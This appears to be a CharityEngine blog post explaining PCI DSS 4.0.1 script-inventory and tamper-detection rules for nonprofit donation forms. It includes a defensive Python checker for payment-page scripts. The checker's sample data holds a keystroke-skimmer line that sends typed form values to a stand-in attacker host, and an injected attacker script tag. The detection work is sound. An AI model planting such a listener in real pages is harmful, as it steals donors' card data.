Follow along as we talk about the donor experience, new rules, fundraising, and hefty fines. While PCI compliance isn't the most exciting subject, online donations are a critical source of fundraising, and there is renewed security scrutiny now that requirements introduced in the latest standard have become mandatory.
As of March 31, 2025, PCI DSS 4.0.1 is the current version of the Payment Card Industry Data Security Standard, the set of requirements issued by the PCI Security Standards Council to keep cardholder (in our case, donor) data safe. The Council was founded by the major card brands, including Visa, Mastercard, Discover, and American Express.
PCI DSS governs how any organization that accepts card payments stores, processes, and transmits cardholder data. It is not a law; it is a contractual obligation that reaches you through your payment processor and acquiring bank, and it is revised as new threats emerge and technology changes.
CharityEngine recently published an article on what nonprofits need to know about PCI 4.0. The article provides a comprehensive look at how nonprofits can keep donor data safe.
However, in this article, we will focus on one of the more nuanced rules and look ahead to educate our clients and other nonprofits.
We will focus on two types of forms: embedded forms and redirect forms.
When a donor lands on your website, one of two things likely happens. The first is that the form appears on a page you control, either built into the page as a module or popping up in front of the donor when they click a donate button. Both are called embedded forms.
There are benefits to embedded forms:
Many CharityEngine clients use embedded forms with great success.
The other possibility is that the donor clicks the donate button and is taken off your website to a dedicated donation page hosted by the processor. This is called a redirect (or hosted) form.
Some studies suggest that dedicated donation pages are more attractive to donors making larger gifts, as the pages appear more trustworthy.
Until now, nonprofits could choose whichever form they preferred. Then criminals worked out that they could steal card data without touching the payment form itself, by compromising the other code on the page around it. Every script that runs on your donation page (Google Analytics, a tag manager, a chat widget, a font loader) executes with the full privileges of that page: it can read and rewrite anything in the page, capture keystrokes, overlay a fake card form on top of the real one, or swap the processor's form for one that posts to the attacker. Hijack one of those scripts, whether by compromising the third party that serves it or by altering your own site, and the attacker controls everything the donor sees and types. This class of attack is known as web skimming; the Magecart groups are its best-known practitioners.
PCI DSS 4.0.1 answers this with two requirements that became mandatory on March 31, 2025. Requirement 6.4.3 says every script loaded and executed on a payment page must be inventoried with a written justification, authorized, and have its integrity assured. Requirement 11.6.1 says a change- and tamper-detection mechanism must alert you to unauthorized changes to the security-impacting HTTP headers and script contents of payment pages as received by the consumer's browser, evaluated at least weekly or as often as your risk analysis dictates. If the form is embedded in your page, your page is a payment page, and those requirements fall on you.
This is a drastic change that nonprofits using embedded forms must be aware of and prepared to manage. If your nonprofit uses embedded forms, it is at risk of PCI noncompliance.
The payment processor, whether CharityEngine, Stripe, or someone else, is responsible for the form itself. If the form has a Google Pay button, Google is responsible for that.
However, the nonprofit is responsible for everything else on that page: your own code, your CMS theme, and every third-party script the page loads. This applies to every page on your website with an embedded form.
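To make the responsibility concrete, here is an added example of the two controls described above, written for this article rather than taken from CharityEngine or the PCI Security Standards Council: a script inventory with integrity hashes for every script on the donation page (Requirement 6.4.3) and a check that re-reads the page and its scripts as the browser would receive them and alerts on anything that differs from the baseline (Requirement 11.6.1). Every hostname, script body and page below is constructed sample data; `fetch()` stands in for an HTTP GET of each script, and the finding names are this example's own.

```python
"""Payment-page script inventory and tamper check (added example, constructed data).

Baseline: authorized script URLs with the SRI hash of their bytes, plus hashes of
authorized inline snippets. Check: re-read the page, flag unapproved scripts, scripts
whose served bytes changed, tags lacking integrity attributes, and altered inline code.
"""
import base64
import hashlib
from html.parser import HTMLParser

# --- Constructed sample data: hypothetical hosts, not real services -----------------------
PROCESSOR_URL = "https://pay.example-processor.test/embed.js"  # serves the payment form
ANALYTICS_URL = "https://analytics.example.test/tag.js"         # an ordinary third-party tag
SKIMMER_URL = "https://cdn.example-attacker.test/s.js"          # injected by an attacker

PROCESSOR_JS = b"window.DonationEmbed = { mount: function (el) { /* draws the card form */ } };"
ANALYTICS_JS = b"window.track = function (ev) { /* sends a page view */ };"
# The same analytics file after its host is compromised: a keystroke skimmer is appended.
ANALYTICS_JS_SKIMMED = ANALYTICS_JS + (b"\ndocument.addEventListener('input', function (e) {"
    b" fetch('https://collect.example-attacker.test/?d=' + encodeURIComponent(e.target.value)); });")
SKIMMER_JS = b"/* attacker-controlled loader */"
INLINE_CONFIG = "DonationEmbed.mount(document.getElementById('donate'));"


def sri(body: bytes) -> str:
    """Subresource Integrity value (sha384, base64) for a script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode()


class ScriptCollector(HTMLParser):
    """Collects every <script> on a page: external (src, integrity attr) and inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []  # list of (src, integrity-or-None)
        self.inline = []    # list of inline script text
        self._buf = None    # accumulates an inline body between <script> and </script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity")))
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None


def build_inventory(page_html: str, fetch) -> dict:
    """Baseline taken while the page is known-good; keep it under change control."""
    c = ScriptCollector()
    c.feed(page_html)
    return {"external": {src: sri(fetch(src)) for src, _ in c.external},
            "inline": {sri(text.encode()) for text in c.inline}}


def check_payment_page(page_html: str, fetch, inventory: dict) -> list:
    """Compare the page as served against the baseline. Returns (finding, subject) pairs; empty = clean."""
    findings, seen = [], set()
    c = ScriptCollector()
    c.feed(page_html)
    for src, integrity in c.external:
        seen.add(src)
        if src not in inventory["external"]:
            findings.append(("UNAUTHORIZED", src))  # a script nobody approved (6.4.3)
            continue
        expected = inventory["external"][src]
        if integrity is None:
            findings.append(("NO_SRI", src))        # browser will run whatever bytes the host serves
        elif integrity != expected:
            findings.append(("SRI_CHANGED", src))   # the tag on the page itself was edited
        if sri(fetch(src)) != expected:
            findings.append(("MODIFIED", src))      # the file on the host changed (11.6.1)
    for src in inventory["external"]:
        if src not in seen:
            findings.append(("MISSING", src))       # an approved script was removed or replaced
    for text in c.inline:
        if sri(text.encode()) not in inventory["inline"]:
            findings.append(("INLINE_CHANGED", text[:60]))
    return findings


def page(script_tags: str) -> str:
    return f"<html><body><h1>Donate</h1><div id='donate'></div>{script_tags}</body></html>"


def tag(url: str, body: bytes) -> str:
    return f'<script src="{url}" integrity="{sri(body)}" crossorigin="anonymous"></script>'


CLEAN_PAGE = page(tag(PROCESSOR_URL, PROCESSOR_JS) + tag(ANALYTICS_URL, ANALYTICS_JS)
                  + f"<script>{INLINE_CONFIG}</script>")
# Tampered: the analytics host now serves the skimmed file (the SRI on its tag is unchanged, so a
# browser would refuse to run it) and a bare script tag with no integrity attribute was injected.
TAMPERED_PAGE = page(tag(PROCESSOR_URL, PROCESSOR_JS) + tag(ANALYTICS_URL, ANALYTICS_JS)
                     + f'<script src="{SKIMMER_URL}"></script>' + f"<script>{INLINE_CONFIG}</script>")


def fetch_clean(url):
    return {PROCESSOR_URL: PROCESSOR_JS, ANALYTICS_URL: ANALYTICS_JS}[url]


def fetch_tampered(url):
    return {PROCESSOR_URL: PROCESSOR_JS, ANALYTICS_URL: ANALYTICS_JS_SKIMMED, SKIMMER_URL: SKIMMER_JS}[url]


INVENTORY = build_inventory(CLEAN_PAGE, fetch_clean)

if __name__ == "__main__":
    print("clean page:", check_payment_page(CLEAN_PAGE, fetch_clean, INVENTORY))
    for finding in check_payment_page(TAMPERED_PAGE, fetch_tampered, INVENTORY):
        print("ALERT", *finding)
```

Two points the example makes that the prose alone does not. The `integrity` attribute (Subresource Integrity) protects you when a third party's file is altered, because the browser refuses to run bytes that do not match the hash; it does nothing when the page itself is altered to add a new tag, which is why the check also compares the set of scripts against the approved inventory. And a real deployment has to fetch the page from outside your own network, as a donor's browser would, and run on the schedule 11.6.1 requires; a check that only inspects source files in your CMS will miss changes made at a CDN or by an injected tag manager rule.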
Moving forward, nonprofit processes will have to adapt.
The easiest solution is to choose a redirect form. Because the donor leaves your site to enter card details, your pages never host the payment form and most of the headache and expense of compliance falls away. You still need to keep your own site from being altered to send donors somewhere other than your processor, but that is a far smaller burden than monitoring every script on every page that carries a form.
To be clear, the embedded form itself is not the weak point; the processor secures the form. The risk is the rest of your page, because every script on it can reach into what the donor sees and types.
Do they have improved conversion rates? Potentially, but not drastically higher than dedicated donation pages (remember, our clients use both!). They do offer a smoother donor experience and some clients prefer them.
That experience must simply now be weighed against the responsibility of compliance.
PCI compliance isn’t a joke or something to be taken lightly. While it’s not likely someone will be knocking on your door immediately if you slip up, the consequences for noncompliance are harsh and, in some cases, irreparable.
While it varies, there will be costs associated with scanning your website, documenting compliance, and rectifying any issues that arise.
Between IT expenses, documentation requirements, and third-party scanning services, we estimate that the annual maintenance required to comply with these new embedded form requirements will cost around $800 to $1,200 a year for smaller websites with a few pages and could be as high as $5,000 or more for larger organizations with hundreds of webpages housing embedded forms.
Obviously, the worst consequence would be that your website is breached, your donor data is stolen, and your reputation is severely damaged. No nonprofit wants to be on the nightly news because of a data breach, and once donor trust is lost, it is very difficult to regain.
But there are real financial consequences if you're just "caught." Fines can range from $5,000 to $100,000 per month, depending on the severity of the violation and the length of the noncompliance. These fines are levied by the card brands on your acquiring bank, which passes them on to you under your merchant agreement. You can also face legal fees or even lose the ability to process credit card payments.
If you choose to use embedded forms and accept the responsibility of monitoring compliance, it must be taken seriously.
If you love your embedded forms and want to keep them, what’s next?
We will urge clients to complete Self-Assessment Questionnaire A (SAQ A) from PCI DSS. This questionnaire is designed for merchants, nonprofits included, that fully outsource all cardholder data functions to PCI DSS validated third-party service providers, like CharityEngine, and do not store, process, or transmit card data on their own systems.
You can find the current questionnaire on the PCI Security Standards Council website (pcisecuritystandards.org).
We've examined the PCI guidelines closely and believe (no inside knowledge here) that the Council is steadily hardening its e-commerce requirements. Attackers keep finding new ways in, and each revision tightens the standard wherever it can.
For example, most of the requirements that PCI DSS 4.0 introduced as "best practice" were future-dated and became mandatory on March 31, 2025, the script inventory (6.4.3) and tamper-detection (11.6.1) requirements among them. We expect this trend to continue.
Again, this is not a call to burn embedded forms to the ground. It is a call to understand the risks and weigh those risks against the reward of an embedded form versus a redirect. If you accept the risk, you must also accept the responsibility.
At CharityEngine, we excel at helping nonprofits stay compliant and manage risk. If you'd like to talk about how we can help your nonprofit, just schedule a call with us.